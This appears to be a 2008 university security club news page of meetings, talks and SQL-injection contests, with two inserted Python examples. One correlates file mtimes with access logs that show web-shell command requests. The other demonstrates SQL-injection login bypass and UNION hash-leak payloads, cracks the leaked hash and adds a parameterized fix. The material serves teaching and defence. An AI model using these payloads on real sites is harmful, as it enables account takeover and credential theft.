UA Computer Security Club

Fall '08 Meeting Schedule

posted September 8, 2008 by Justin

Here's the meeting plan for this semester:

We meet every Tuesday @ 5pm in Gould-Simpson 906.

This semester we're preparing for the iCTF (that site may still say 2007 iCTF, but Giovanni assured me they're doing it again this year).

Mailing Lists Moved to Google Groups

posted September 8, 2008 by Justin

We've set up a Google Group to replace the mailing list. You can continue to use it like a mailing list or, if you prefer, you can use it with your Google account and do fancy stuff like create pages of information for the group (tutorials, etc.)

More info on the mailing lists page.

Apr 29th Speaker: Shawn Nock on datacenter auditing

posted Apr 22, 2008 by Justin

Shawn Nock from the University Information Technology Services (UITS) will be talking about datacenter security audits he has performed, some experiences, and will likely show us some tools of the trade.

See you all there on Tuesday, April 29th @ 5pm, Gould-Simpson 906.

Contest #3

posted Apr 22, 2008 by Justin

Contest #3 is up

It went online at 2008-04-22 08:39 MST (people at the meeting got a first peek).

This month's contest prize will be a book kindly donated by No Starch Press.

Winner: Silviu Smarandache [Thu, 24 Apr 2008 13:35:37 -0700]

Prize still available to runner up! Silviu knows he can't get the book every time, so if somebody else can solve this they can win the book!

Recap of last few meetings

posted April 4, 2008 by Justin

We've had some great stuff at the last few meetings. Here's a quick summary:

  • April 1: Silviu Smarandache showed us some great SQL injection techniques and showed us his winning solution to Contest #2 (I'll post those solutions soon).
  • March 25: I walked us through forensics on a compromised website, using filesystem modification times and webserver log files to identify how the site was compromised (which turned out to be some very poorly written code combined with a comically bad administrator password). We also took a quick look at some interesting scripts the attackers left behind.
  • March 18: no meeting (spring break)
  • March 11: Keith Larrimore gave us an awesome presentation on the vmsplice vulnerability, walking us through the vulnerable kernel code and the simple mistakes that led to the major problem.
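The core of the March 25 walkthrough, pairing each modified file's mtime with the requests that hit the webserver around that moment, can be scripted. The following is an added example and not a recording of the meeting or the real site's data: the paths, timestamps, client addresses and log lines are constructed to show the method, and the log format assumed is the Apache "combined" format.

```python
"""Correlating file modification times with webserver log entries.

Added example, not the material from the March 25 walkthrough: the paths,
timestamps, IPs and log lines below are constructed to illustrate the method
(find the requests that arrived around the moment each suspicious file was
written), not taken from the compromised site discussed at the meeting.
"""
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" log format: client, ident, user, [timestamp], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

MST = timezone(timedelta(hours=-7))

# Constructed: what `find /var/www -newer <known-good file>` plus `stat` might list.
MODIFIED_FILES = {
    "/var/www/images/shell.php": datetime(2008, 3, 25, 3, 14, 6, tzinfo=MST),
    "/var/www/index.html":       datetime(2008, 3, 25, 3, 14, 20, tzinfo=MST),
}

# Constructed access log lines for the same night (not real traffic).
ACCESS_LOG = """\
10.0.0.5 - - [25/Mar/2008:02:58:11 -0700] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Mar/2008:03:13:58 -0700] "GET /admin/login.php HTTP/1.1" 200 1830 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Mar/2008:03:14:02 -0700] "POST /admin/login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Mar/2008:03:14:05 -0700] "POST /admin/upload.php HTTP/1.1" 200 212 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Mar/2008:03:14:09 -0700] "GET /images/shell.php?cmd=id HTTP/1.1" 200 77 "-" "Mozilla/5.0"
198.51.100.23 - - [25/Mar/2008:03:14:19 -0700] "GET /images/shell.php?cmd=echo+pwned>../index.html HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.7 - - [25/Mar/2008:03:40:40 -0700] "GET /index.html HTTP/1.1" 200 11 "-" "Mozilla/5.0"
"""


def parse_log(text):
    """Parse combined-format lines into dicts with timezone-aware timestamps."""
    entries = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable lines are skipped here; count them in real work
        entries.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"],
            "path": m["path"],
            "status": int(m["status"]),
        })
    return entries


def requests_near(mtime, entries, window=timedelta(seconds=10)):
    """Requests whose timestamp falls within +/- window of the file's mtime."""
    return [e for e in entries if abs(e["ts"] - mtime) <= window]


def correlate(modified, entries, window=timedelta(seconds=10)):
    """Map each modified file to the log entries that arrived around its mtime."""
    return {path: requests_near(mtime, entries, window) for path, mtime in modified.items()}


def likely_cause(mtime, entries, window=timedelta(seconds=10)):
    """The last request at or before the mtime: the best candidate for having written the file."""
    before = [e for e in requests_near(mtime, entries, window) if e["ts"] <= mtime]
    return max(before, key=lambda e: e["ts"]) if before else None


def suspect_ips(correlation):
    """Client addresses that show up near more than one modified file."""
    counts = {}
    for hits in correlation.values():
        for ip in {e["ip"] for e in hits}:
            counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n > 1)


if __name__ == "__main__":
    log = parse_log(ACCESS_LOG)
    for path, mtime in MODIFIED_FILES.items():
        cause = likely_cause(mtime, log)
        print(f"{path} modified {mtime:%H:%M:%S}; likely cause: "
              f"{cause['method']} {cause['path']} from {cause['ip']}" if cause else f"{path}: no nearby request")
    print("IPs near several modified files:", suspect_ips(correlate(MODIFIED_FILES, log)))
```

The window is the judgment call: too narrow and you miss slow uploads, too wide and every modified file "correlates" with normal traffic. Running the same correlation with the log's own write-capable requests (POSTs, and GETs carrying a `cmd=` style parameter) narrows it further, and the files the attacker left behind become the seeds for the next round of timeline building.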

Contest #2

posted Feb 25, 2008 by Justin

Contest #2 is up

It went online at 2008-02-25 01:10 MST (a little over an hour after planned).

This month's contest prize will be a book kindly donated by No Starch Press.

Winner: Silviu Smarandache won the contest at 2008-02-25 09:47:45 MST. He doesn't get the book, though, as he won a book recently (last contest). No second place was claimed before enough hints had been given out to inspire the club to award a book to the runner-up. That just means more books left for future prizes!

Meeting schedule decided

posted Feb 23, 2008 by Justin

The first meeting on Tuesday went great. More than 30 people showed up! Much fun and learning was had by all.

It was decided that we should have meetings every Tuesday at 5pm.

All meetings will be in Gould-Simpson 906 with the exception of the Feb. 26 meeting.

The next informal meeting will be Tuesday, February 26. Note: This meeting will be in a different room than normal. We'll meet in GS 701 rather than GS 906.

The next regular meeting will be Tuesday, March 4. Keith Larrimore is going to talk about the recent vmsplice kernel vulnerability. Don't miss it!

More info about upcoming meetings.

First Meeting: Tuesday, Feb. 19, 5:00pm, GS 906

posted Feb 12, 2008 by Justin

Our first meeting has been scheduled, mark your calendars:

Tuesday, Feb. 19, 5:00pm, Gould-Simpson 906

If you can't make it at that time, please complain! It could turn out we find a time where more people can show up, and we won't know unless you complain. Send your complaints to info -at- uacompsec.org.

Contest #1: SQL Injection for Web App Account Access

posted Feb 12, 2008 by Justin

Security Contest #1 is up for those wanting to try their hand at exploiting an insecure web application using SQL injection:

You can find the contest page here.

There are two different challenges in this contest:
* Easy challenge: Can you get logged in as the user "admin"? (That is, can you get shown the "Welcome" message along with the user's "secret info" which is displayed after they log in?)
* Hard challenge: Can you get the unhashed password for the user "admin" so that you can log in just as that user would? (That is, can you obtain enough information such that you can log in without SQL injection?)
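To make the two challenges concrete, here is an added example (not the contest application's code, whose stack, schema and hashing scheme this page does not describe): a login routine that concatenates the username into its SQL, the two classes of payload the easy and hard challenges call for, the offline dictionary step that turns the leaked hash back into a password, and the parameterized query that closes the hole. Assumed: an in-memory SQLite table `users(username, pwhash, secret_info)`, unsalted SHA-256 hashes, and constructed sample accounts.

```python
"""Contest #1 style login: injectable query beside its parameterized fix.

Added example, not the contest application's own code (its stack, schema and
password hashing are not described on the club page). Assumed here: an
in-memory SQLite table users(username, pwhash, secret_info), unsalted SHA-256
hashes, and constructed sample accounts.
"""
import hashlib
import sqlite3

ADMIN_PASSWORD = "hunter2"  # constructed; only used to build the sample table


def sha256_hex(text):
    return hashlib.sha256(text.encode()).hexdigest()


def make_db():
    """Constructed sample data standing in for the contest's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwhash TEXT, secret_info TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("admin", sha256_hex(ADMIN_PASSWORD), "admin's secret info"),
         ("alice", sha256_hex("wonderland"), "alice's secret info")],
    )
    return conn


def vulnerable_login(conn, username, password):
    """Query built by string concatenation: the username lands inside the SQL text."""
    query = ("SELECT username, secret_info FROM users "
             "WHERE username = '%s' AND pwhash = '%s'" % (username, sha256_hex(password)))
    return conn.execute(query).fetchone()  # (username, secret_info) or None


def hardened_login(conn, username, password):
    """Same query with bound parameters: user input can never change the SQL."""
    return conn.execute(
        "SELECT username, secret_info FROM users WHERE username = ? AND pwhash = ?",
        (username, sha256_hex(password)),
    ).fetchone()


# Easy challenge: close the string literal, then comment out the password check.
EASY_PAYLOAD = "admin'--"

# Hard challenge: the page only displays two columns, so UNION the hash into them.
HARD_PAYLOAD = ("' UNION SELECT pwhash, pwhash FROM users "
                "WHERE username = 'admin'--")


def crack_hash(pwhash, wordlist):
    """Offline dictionary attack on the leaked, unsalted hash."""
    for candidate in wordlist:
        if sha256_hex(candidate) == pwhash:
            return candidate
    return None


def run_demo():
    conn = make_db()
    easy = vulnerable_login(conn, EASY_PAYLOAD, "anything")
    leaked = vulnerable_login(conn, HARD_PAYLOAD, "anything")
    recovered = crack_hash(leaked[0], ["password", "letmein", "hunter2"]) if leaked else None
    return {
        "easy_bypass": easy,
        "leaked_hash": leaked[0] if leaked else None,
        "recovered_password": recovered,
        # With the password in hand the attacker logs in normally, even against the fixed code.
        "legit_login_after_crack": hardened_login(conn, "admin", recovered) if recovered else None,
        "hardened_vs_easy": hardened_login(conn, EASY_PAYLOAD, "anything"),
        "hardened_vs_hard": hardened_login(conn, HARD_PAYLOAD, "anything"),
    }


if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Two points worth noticing: the hard challenge is only "hard" because the page shows the attacker exactly two columns, so the payload has to line up with that shape; and the parameterized version stops both payloads cold, but does nothing about the hash that was already leaked, which is why the contest's hard challenge ends with a perfectly normal login.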

Want a tip? Have a gripe? Want to see if you were first and won? Send your victory reports, questions and comments to info -at- uacompsec.org.

Note: The contest is intended for University of Arizona students and faculty. If you aren't from the UA, you are welcome to give it a try, but you won't be credited with winning the contest and non-UA IP addresses are subject to blocking if they are abusive.

Hard challenge results:
Winner: Silviu Smarandache [Thu, 14 Feb 2008 11:53:49 MST]
1st runner up: Keith Larrimore [Thu, 14 Feb 2008 15:55:00 MST]
2nd runner up: Todd Knight [Fri, 15 Feb 2008 11:46:05 MST]

(Silviu: Sorry for missing your email initially! Not enough sleep and small my mind lose.)

If you're enjoying the challenge, don't stop just because someone else got there first! Maybe we'll even list people in order of time they reported the solution, or maybe your solution will be more elegant. We'll discuss the different solutions at the meeting on Tuesday and post them afterwards.